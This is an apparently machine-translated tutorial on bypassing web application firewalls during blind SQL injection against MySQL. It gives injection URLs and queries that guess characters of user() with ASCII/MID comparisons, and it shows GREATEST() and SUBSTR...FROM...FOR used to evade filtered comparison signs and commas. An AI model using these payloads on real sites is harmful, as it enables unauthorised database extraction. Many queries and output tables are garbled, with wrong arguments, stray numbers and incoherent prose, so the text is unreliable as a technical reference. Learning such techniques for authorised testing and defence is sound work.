Tips:Injection point used: Support Union can error support multi-line execution, executable system command, HTTP request, and other advantages other than the above type, you may need a brute force guess. When you are guessing, you may encounter some limitations. All the attackers have to do is break them up. 1. Binary is typically used to find a single character by bypassing the greatest function, which cannot be used to guess the size of a symbol. Mysql> Select ASCII (Mid (User (),) < 150;+------------------------------+| ASCII (Mid (User (), max)) < |+------------------------------+| 1 |+------------------------------+246mysql> Select ASCII (Mid (User ()) < 150;+--------------------------- ---+| ASCII (Mid (User (), max)) < |+------------------------------+| 1 |+------------------------------+ is the ASCII code that determines whether the first character of user () is less than 150. Returns True (1) if it is less than 150, otherwise false (0) is returned. You can see that you need to use the size to symbol. For example, for a Boolean based injection. Try: Http://xxx.com/index.php?id=1 and ASCII (Mid (User (), up)) < 150http://xxx.com/index.php?id=1 and ASCII (Mid (user (), ()) >= 150 The content returned by the above two pages should be different. But the problem is, in some cases, we can't use the size-to-symbol (<>), which is filtered. At this point, you can bypass the greatest function. Greatest (A, b), which returns the larger of the number in a and. Use:mysql> Select Greatest (ASCII (User (), 1, 1) when we want to guess whether the ASCII code for the first character of user () is less than or equal to 150, =150;+------------------------------------------+| Greatest (Mid (User (), max)) =150 |+------------------------------------------+| 1 |+------------------------------------------+246mysql> Select Greatest (ASCII (Mid (User (), max)) =150;+---- --------------------------------------+| Greatest (Mid (User (), max)) =150 |+------------------------------------------+| 1 |+------------------------------------------+ if less than 150, the above return value is true. 2. There are fewer cases where commas cannot be used by using the SUBSTR function to bypass commas, often because commas have certain special effects and are handled separately. Usually, the guess is to use a comma, because the mid function is required to take the character na: ASCII (User (), =150ascii) (Mid (User (), 1, 1)) =150 Bypass method is to use from X for Y. Similar syntax: Mid (User () from 1 for 1) or substr (User () from 1 for 1) 2mid (User () from 1 for 1) or substr (User () from 1 for 1) above is also from the first word on First, take one character. Then, without a comma-injected syntax, it can become:mysql> select ASCII (substr (User () from 1 for 1)) < 150;+------------------------------------- -----+| ASCII (substr (User () from 1 for 1)) < |+------------------------------------------+| 1 |+------------------------------------------+mysql> Select ASCII (substr (User () from 1 for 1) < 150;+---------- --------------------------------+| ASCII (substr (User () from 1 for 1) < |+------------------------------------------+| 1 |+------------------------------------------+ is not the same as the mid function, and does not use commas.
SQL Injection Bypass WAF